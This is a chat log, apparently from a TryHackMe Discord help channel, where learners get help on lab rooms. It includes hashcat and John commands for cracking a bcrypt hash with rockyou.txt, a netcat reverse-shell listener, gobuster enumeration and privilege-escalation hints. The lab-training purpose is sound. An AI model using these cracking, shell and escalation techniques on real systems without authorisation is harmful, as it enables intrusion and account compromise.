Nvidia drivers come with cuda stuff @white salmon

grand pivot
#

ty

stuck fractal
#

Gaming laptop, it will have cuda working

#

@outer meteor source code is the raw program before it's been compiled

#

You don't want to have to compile it.

outer meteor
#

ohh ok

#

thx

stuck fractal
#

Binaries are compiled code

outer meteor
#

ty :)

white salmon
#

I have a problem here: Hacking with Powershell[Task 3][#3]I have tried:||Get-Command | measure = 7935|| but it is not accepted can someone help me ?

stuck fractal
#

That doesn't correctly filter.

#

You need the number of cmdlets

outer meteor
#

another thing do i need any wordlist to get the cracked password?

#

because it didn't work

white salmon
#

ok

#

@outer meteor what do you mean ?

outer meteor
#

this

white salmon
#

send the command

outer meteor
#

hashcat64.exe -m3200 -a0 -o cracked.txt hash.txt

stuck fractal
#

You stopped it earlier

#

And sorry, what

#

Those arguments

#

Talk me through them.

#

Mode is bcrypt

#

-a0 is redundant, don't need it

#

What's the two txts?

outer meteor
#

hash.txt is the hash and the other is where the cracked password is going to

stuck fractal
#

Don't do that

white salmon
#

where is the wordlist ?

stuck fractal
#

You need to give it a word list otherwise it expects input from stdin

outer meteor
#

@white salmon i was thinking about that xD

stuck fractal
#

It's bcrypt, it's also gonna take a while to crack

#

Just so you know

white salmon
#

hashcat64 -m 3200 hash.txt rockyou.txt

outer meteor
#

but i need to download the rockyou.txt

stuck fractal
#

-O (capital o) for optimised

#

Yes

#

Google "rockyou.txt" and click the brandon orsey naive-hashcat one

#

Put it in the folder

outer meteor
#

i can run this command then : hashcat64.exe -m3200 -O cracked.txt rockyou.txt

white salmon
#

hello

outer meteor
#

hi

stuck fractal
#

@outer meteor nope, you're missing something

white salmon
#

-m 3200

stuck fractal
#

And also capital O is different to -o

#

hashcat -m mode hash wordlist -O

white salmon
#

you dont need cracked.txt

outer meteor
#

jesus christ

#

so much information

#

so i can do

#

hashcat -m 3200 hash.txt rockyou.txt -O

#

?

white salmon
#

yes

outer meteor
#

and the -O makes it faster?

#

because the other guy said optimised

stuck fractal
#

Yes.

outer meteor
#

gonna try it now

stuck fractal
#

It doesn't make it faster for all hashes, but it won't make it slower for those ones

#

It will take a long time

#

Even on my GTX 980, it takes a long time

outer meteor
#

i mean it's only one password

stuck fractal
#

Yea

#

But it's bcrypt

#

It's designed to be a pain to crack

outer meteor
#

i've just remembered my gpu only has 2gb of vram

#

ffffffff

stuck fractal
#

Doesn't matter

outer meteor
#

really?

white salmon
#

vram is not the same as speed

#

just start it and wait

outer meteor
#

sry for being this dumb

stuck fractal
#

If the hashing algorithm needs more VRAM, hashcat will tell you

outer meteor
#

i feel bad for asking u guys a lot of this stuff

#

@white salmon i saw that ahaah

#

it's alright

#

what happens when it finds the password

#

it stops?

white salmon
#

it blows up

outer meteor
#

SHIT

stuck fractal
#

@outer meteor DW, you'll probably be cracking for another decade or so

outer meteor
#

yeah

#

this one is gonna take a decade

stuck fractal
#

Bcrypt was specifically designed to be about as fast on a graphics card as it is on a CPU

outer meteor
#

rip

#

I've gotta ask a new pc for this

stuck fractal
#

940MX is showing it's age now

outer meteor
#

yup

#

the problem is that my parents won't buy it so

stuck fractal
#

Learn more hacking -> Start making boxes for TryHackMe -> Make commissioned boxes -> buy PC

outer meteor
#

hmm

#

that seems like a good idea

#

have u done that before?

stuck fractal
#

I currently do

outer meteor
#

could u tell me some rooms you've made?

stuck fractal
#

And some KoTH boxes

pine ermine
#

Does someone know why this would happen?
I started a simple nc listener and am receiving a (reverse shell) connection, but it's completely onresponsive. I tried python, bash, etc, all I am getting is:

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.168.15 38827 received!
ls
#

Some sort of firewall on the box?

stuck fractal
#

Reverse shells are designed to get around that

pine ermine
#

Yea

stuck fractal
#

What box?

pine ermine
#

Tempus Fugit Durios

stuck fractal
#

Can't really help then

solemn smelt
#

I want to start making boxes so I can eventually make commissioned boxes and on the thm creators program but Iโ€™m not confident in making boxes I can make all kinds of osint, crypto, and stego challenges but I need to practice making boxes

stuck fractal
#

Just do it for fun to start with

pine ermine
#

Allright, sorry - did get a responsive shell now. Nevermind me :p

outer meteor
#

I stoped the cracker because it can't do nothing

#

my gpu is too slow

#

it was on 0.11%

#

not even 1%

stuck fractal
#

@outer meteor So you can use your brain to speed it up a bit

outer meteor
#

;(

stuck fractal
#

You know the length of the password, and you know it's in rockyou

#

Why not filter rockyou to only 4chars?

outer meteor
#

bruh

#

forgot that

#

still

#

it probably will take a lot of time

stuck fractal
#

Much less time

outer meteor
#

yeah but with my gpu it will be the same thing

stuck fractal
#

Not really

outer meteor
#

it will take a day probably

stuck fractal
#

Reducing the amount of passwords it has to try will reduce the amount of time it'll take to crack it

outer meteor
#

can u tell me then what do i put in the command?

stuck fractal
#

Huh?

outer meteor
#

how do i put 4 chars?

#

also if i brute-force will it be faster?

stuck fractal
#

You have to filter the wordlist

#

Basically making a new wordlist

#

Brute force, you don't know what characters are in it so it's (26+26+10) for a-zA-Z0-9 and then that ^4

#

That's 14million possibilities

#

Same as rockyou, roughly

outer meteor
#

ok

#

i need help to filter the file

stuck fractal
#
#

pw-inspector in kali

white salmon
#

the room steel mountain, what cve is it expecting? i found couple and it won't accept...any of it

stuck fractal
#

Well what did you exploit to gain access?

#

Go from there.

white salmon
#

but it won't accept my anwsers

stuck fractal
#

CVE number

#

so not CVE-6969-6969

#

just the 6969-6969

white salmon
#

damn, feel stupid now. i thought i tried any combination already, also that one. tried it again...it works. thanks ..

stuck fractal
#

Answer format.

patent token
#

Count the little * to confirm in the future.

naive geyser
#

hey guys how do download a smb share

stuck fractal
#

Rule 13

naive geyser
#

aight

#

i did

stuck fractal
#

Then you didn't google it right

naive geyser
#

i m goign to do it again

stuck fractal
#

You don't mean download a share.

#

You want to access a share and download files

#

You can't download a share

#

A share is not a file

naive geyser
#

thanks

#

i ll read more into it

outer meteor
#

@stuck fractal dude is there a command to run hashcat with the gpu, or is it already using the gpu?

stuck fractal
#

It already does by default

#

John uses CPU unless you compile it for OpenCL

outer meteor
#

because when i go to task manager it wasn't using any of the gpu power

summer snow
#

I think you can do something like -D 1 or whatever the device ID is to switch hashcat to cpu

outer meteor
#

but when i go to task manager it's not using any gpu power

#

it's in 0%

stuck fractal
#

Printscreen your hashcat powershell window

outer meteor
#

this is the location

#

now i'm gonna run the command

stuck fractal
#

I said the window...

#

Powershell > CMD for this btw

#

For anything...

outer meteor
#

you mean i have to do it in powershell not in cmd

stuck fractal
#

Have to is a bit strong

outer meteor
#

now i got confused

stuck fractal
#

You can use CMD but CMD is worse than powershell in general

outer meteor
#

then I'll try with powershell

#

there it goes

stuck fractal
#

It's using it

#

But you're cracking bcrypt

outer meteor
#

no sense

#

it's using memory and cpu only

#

otherwise it would show up in the task manager

stuck fractal
#

It's using the GPU.

outer meteor
#

Then i need an explanation

stuck fractal
#

Just accept it and move on

#

It's going to use the CPU for coordinating stuff

outer meteor
#

I still need to filter this wordlist

stuck fractal
#

It ain't gonna be any faster than using your CPU though most likely

#

press s and tell me your speed

outer meteor
#

5 H/s

red minnow
#

from what i've read the bcrypt isn't GPU friendly

outer meteor
#

time estimated 31 days

#

ahaha

stuck fractal
#

You aint gonna crack it at that speed

#

I get 100H/s CPU or GPU

outer meteor
#

but why is my speed so slow

#

my pc ain't that bad

#

(i think)

stuck fractal
#

It's a 940mx

#

That GPU is slower than a 750ti

red minnow
#

it's a laptop's GPU

outer meteor
#

F

stuck fractal
#

Laptop GPU doesn't mean slow

#

940MX does mean slow.

outer meteor
#

but can't the cpu like "help"

stuck fractal
#

You're cracking on the GPU

#

Cracking on that CPU should be faster

#

Download John Jumbo

#

(This advice applies only to bcrypt)

outer meteor
#

Doesn't work in hashcat with cpu then?

stuck fractal
#

I've only seen ways to do that on Linux

red minnow
#

i think if you use -D 1 you'll use the cpu

stuck fractal
#

IDK how you'd do it on windows

#

@red minnow No

#

iGPU

outer meteor
#

I'll search if there is a way

stuck fractal
#

Download john

#

Use john

#

much quicker

outer meteor
#

remembered something tho

#

didn't @white salmon sent a link of cuda to download?

stuck fractal
#

Yeah but that was wrong

#

Nvidia drivers come with it

#

It wouldn't work at all if you didn't have it set up right

outer meteor
#

ok

novel jackal
#

I have a problem with cc pentesting

#

For the hidden file

#

I enumerated them all with gobuster but no one works

rancid crystal
#

i think you use gobuster that gives like 4,5 results and one of those is the hidden directory

novel jackal
#

That's what I did

stuck fractal
#

@novel jackal What's your full command?

outer meteor
#

any idea how i can check my OpenCL version on windows 10?

novel jackal
#

gobuster dir --url <ip> -x xxa --wordlist big.txt

stuck fractal
#

Is it inside the directory you already found?

#

Also, delete the name of it as it's an answer

#

@outer meteor Updating stuff isn't going to make it any faster. The 940MX is a slow card. Download john, use that.

outer meteor
#

the other guy tried john and didn't work

#

i tried it too

stuck fractal
#

"didn't work" what do you mean?

outer meteor
#

it takes to long

#

on both

stuck fractal
#

It will be slow

#

Filter the wordlist, use john

outer meteor
#

I'm not gonna leave it 31 days until it finishes

stuck fractal
#

It won't take 31 days

#

But filter the wordlist and use john and it'll get it pretty quick.

outer meteor
#

and i can use the john in linux or in windows?

stuck fractal
#

Either, but windows will be faster

#

You can turn the VM off

outer meteor
#

ok

#

any tips on filtering rockyou.txt

#

didn't find any online recourse on that

stuck fractal
#

I gave you some

#

pw-inspector on kali

#

Or some regex

outer meteor
#

let me run pw-inspector

#

what do i do now?

stuck fractal
#

So did you filter rockyou down to 4 chars to form a new wordlist?

#

4char only passwords

outer meteor
#

idk what the command is xD

stuck fractal
#

You need to learn to do some research

outer meteor
#

watched a video on that

stuck fractal
#

Learn to use manpages and built in help as well as google

outer meteor
#

why can't i drag the new rockyou.txt to my downloads on windows

stuck fractal
#

you're dragging from a VM into not a VM

#

You have to enable it

outer meteor
#

thx

#

done

#

now i need john

#

wich one?

stuck fractal
#

I'm not going to answer that

outer meteor
#

the big one right

#

ahaha

stuck fractal
#

They're the same files

outer meteor
#

downloaded the big boi file

stuck fractal
#

You could have downloaded the smaller one if you had 7zip...

outer meteor
#

actually i have 7zip

#

i must be blind

#

i'ts running

#

how do i see speed

#

?

stuck fractal
#

Look in the window.

#

There's a message

outer meteor
#

holly shit

#

it was fast this time

#

ahahah

stuck fractal
#

It's running on the CPU

#

Bad GPU < mediocre CPU for bcrypt

outer meteor
#

thx for the help

#

and now that i know how to filter it's faster

stuck fractal
#

That's not what made it faster

#

Running it on CPU made it faster

#

Filtering the wordlist means you can find it with less guesses

outer meteor
#

and it's faster

stuck fractal
#

It's faster because you're not using a terrible GPU

outer meteor
#

xD

#

do u know where is the password cracked file?

stuck fractal
#

@outer meteor Rule 13.

outer meteor
#

doesn't exist here

stuck fractal
#

It exists everywhere.

#

Google it.

outer meteor
#

lol

#

it's still a little bit slow

#

nvm

#

it's fast AF

#

it took like 2 min

quartz furnace
#

room learn linux task 33 i made a directory called test and inside it i did put a test1234 file yet even trying to find for the whole system with find /* i cannot get hold of shiba4 did i mess up somewhere?

stuck fractal
#

@quartz furnace yes

#

find /* doesn't work properly

quartz furnace
#

ohhh

stuck fractal
#

/* is interpreted in bash

quartz furnace
#

mhhh not too sure what that means

#

okay but at least i understood what im doing wrong so thanks ๐Ÿ™‚

tidal copper
#

Hi guys, I am playing on "Geolocating Images" room and getting no clues about Task 6. I have recognized the monument on the back and think I got the overall location on a map but do not know how to advance, any nudge for me?

solemn smelt
#

google maps and think about what direction youโ€™re looking

tidal copper
#

Well no direction on image 3. Looks like an observatory but no luck with it

grand pivot
#

|| you are going well, very well||

#

||also try to watch around, what are in the image in the background? whats the geology of that image?||

#

there is 2 things very very very symbolic from that place and you can find it really fast (at least the place where it is)

quartz furnace
#

room learn linux task 43 meaning the last one im stuck eyeing a readme file yet i don't have permission to read the thing any tips to get around that? tryed to use chown and also chmod without success

stuck fractal
#

@quartz furnace You need to get root to get the root flag

quartz furnace
#

well i though maybe i had to look up the password to root first to then be able to access the flag

stuck fractal
#

If you could just look up root passwords, hacking would be a lot easier

quartz furnace
#

so im like pepehands can't find a way to change the root directory

stuck fractal
#

No

#

You need to become root

quartz furnace
#

yeah how do i do that if i need the root access to change user group

stuck fractal
#

Wat

quartz furnace
#

to change user group to root right

stuck fractal
#

What.

#

I don't understand what you mean at all

quartz furnace
#

nvm

#

already tryed switching to shiba1 which's in the root group yet got no access to the folder so i dunno lol

stuck fractal
#

I don't think you quite understand

quartz furnace
#

actually now that im looking at it ur right only user can access the folder

#

so any tips to become root without a password?

inland onyx
#

That, uh

#

Is an entire branch of exploitation

quartz furnace
#

well i just begun so i have nooooooooooo idea

stuck fractal
#

The room teaches you how to run commands as root, right?

quartz furnace
#

@stuck fractal yeah so?

stuck fractal
#

Well, shiba1-4 don't have sudo. But there's more. Maybe look for files belonging to each and every user.

quartz furnace
#

okay

#

i guess im giving up lol machine finished deploy time 1 hour blew past

stuck fractal
#

You can extend them

#

And for that machine, the passwords act as checkpoints so you can redeploy and pick up

quartz furnace
#

y i kn but it's so frustrating not finding a single clue >.>

stuck fractal
#

It's harder than the rest of the room, but easier than most of the challenges here

quartz furnace
#

yikes

#

im in for a beating then if i want to learn from the upcoming rooms

stuck fractal
#

Privilege escalation is something you learn

quartz furnace
#

"Privilege escalation"well that's all i needed to hear

stuck fractal
#

Using tools and scripts ain't gonna work for this one

quartz furnace
#

aaaaaa

#

tryed looking btw all shiba noot directories so far ican't come up with anything any more hints?

graceful nacelle
#

recovery-mode/options/root. im i on the right track for task 43?

stuck fractal
#

@graceful nacelle In learn linux? No

stuck fractal
#

Look for files belonging to each and every user

graceful nacelle
#

hmm thank you

#

@stuck fractal okay thats intresting. why did a new path appear aftetr i did that but not when i went through every single user?

stuck fractal
#

I have absolutely 0 idea what you mean.

graceful nacelle
#

lol thats good. you guys do an amzing job. thank you

torpid geode
#

The trick for Linux walk through's last flag is to add a user to sudoers right?

stuck fractal
#

Not at all

#

You can't add a user to the sudoers unless you're root, can you?

keen zealot
#

Or if you're in sudoers already

torpid geode
#

Hmm I see

stuck fractal
#

I feel that's misleading @keen zealot

#

You can be in sudoers and be able to run sudo and not have root perms

keen zealot
#

True

stuck fractal
#

@torpid geode Look for files belonging to each and every user. And I do mean each and every, not just shibas

torpid geode
#

OK i'll try that

white salmon
#

anyone here who can give me a hint on Tempus Fugit Durius? I got shell and found the file with the credentials but now i'm stuck

torpid geode
#

ok I give up

#

I've been trying for 2 hours +

#

Damn

torpid geode
#

is it related with .sudo_as_admin_successful?

stuck fractal
#

Not really?

torpid geode
#

damn

sick sun
#

anyone give me a hint for privs esc on room ConvertMyVideo ?

stuck fractal
sick sun
#

thanks man i try it

white salmon
#

Any hints for flag2 of /room/tempusfugitdurius

static rampart
#

can anyone help me with intro to python challenge

spiral stag
#

what is your question?

static rampart
#

can i dmm u

spiral stag
#

you can ask here right?

static rampart
#

ok

#

then

#

i have my code which run perfectly

#

but gives me a result of ' 'this only

spiral stag
#

which task are you on?

static rampart
#

to encode a code

#

5 times base64

#

5times base 32

#

this is my code

#

dont know whats the prob

spiral stag
#

ok, pls remove that or mark it as spoiler

static rampart
#

yup

#

help me

spiral stag
#

try making a counter that prints i in range(0,5)

#

see what it prints

static rampart
#

i actually did it

#

when i print data after the first loop

#

the result is ' '

spiral stag
#

you also have an else without if

#

you just need 3 for loops

static rampart
#

we can use else right after for

spiral stag
#

no else

#

else is only if you use an if statement

static rampart
#

no no we can use else after any loop i read it and also tested it

spiral stag
#

when the for loop ends it continues to the next statement on its own

static rampart
#

actually

spiral stag
#

alrighty

static rampart
#

when i decode my code from base 64 1 time it gives me

#

weird text

#

on 2 time the result become as ' '

#

lots of /xdf}/xdf7/

#

like on firt iteration

spring yarrow
#

Hi. Im doing the room "Intro to x86-64" of reverse engineering and i'm stacked on crackme1 file. Do you know how to find correct password ? I added break point to first compare function, but in buffer of var_4ch variable is something wrong.
im using r2 disassembler

spiral stag
#

@static rampart try to declare data first: data = ""

#

then use it

#

@static rampart also, you going the wrong direction

#

if you look in the file, thats not b64 data

#

thats b16 data

marble bridge
#

Where would a HTTP Auth (basic auth) users creds be stored?
@proven bridge thanks for the hint

static rampart
#

@spiral stag means

fossil coyote
#

Hello, I am doing the room convertmyvideo I managed to gain a shell on the machine, but I am stuck on the priviledge escalation part I looked into the sudo rights with (sudo -l) there was nothing there I looked into the kernel version and sudo version to see if there is an exploit for their version nothing there. I then looked at the SUID and GUID binaries there was nothing of interest I ran all of the bins that I found suspicious through gtfobins but still no result I am really stuck does anyone have an Idear into what I could look into next? I am out of idears :c

cedar coral
#

@fossil coyote pm me

snow drift
#

hello, imd oing the Advent of Cyber challenge, im at task 6 and i managed to get the cookie, decode it but im stuck, i dont understand how to use that cookie info to acces mcinventory account

#

and see what he requested

#

i tryed using the Burp Suite but i cant manage to make it work

#

i also tried to edit the cookie

#

or intersepting the data

#

oh shit i made it

#

im a god

#

it took me about 5 hours

#

that one second of clearness was just beautiful

#

godam this feels so good

steady stratus
#

PogChamp nice one @snow drift !

snow drift
#

thanksss

echo thunder
#

can anyone give me a hint please on temple fugit durius

#

?

shrewd skiff
#

@echo thunder what did you find so far ? Give some idea to where you are. Just asking for help out in the blue is a bit difficult to answer.

tranquil dagger
#

I feel like a need a nudge on "Tempus Fugit Durius" as well. Been stuck for a really long time now, trying to get flag #2.

shrewd skiff
#

@tranquil dagger do you have root?

#

look at that

tranquil dagger
#

No, I don't have root. Been going in circles for what seems like an eternity.

#

Thanks, will have a look ๐Ÿ™‚

shrewd skiff
#

so what user do you have now? put in spoiler tags

tranquil dagger
#

||benclower||

shrewd skiff
#

@tranquil dagger did you try to spawn a new shell?

#

look for SUID files too

tranquil dagger
#

I did that as part of my enum process, but I guess I missed something crucial

#

Will try again later. Thanks ๐Ÿ™‚

low current
#

How do you specify which shell is used when you login?

#

can an one help me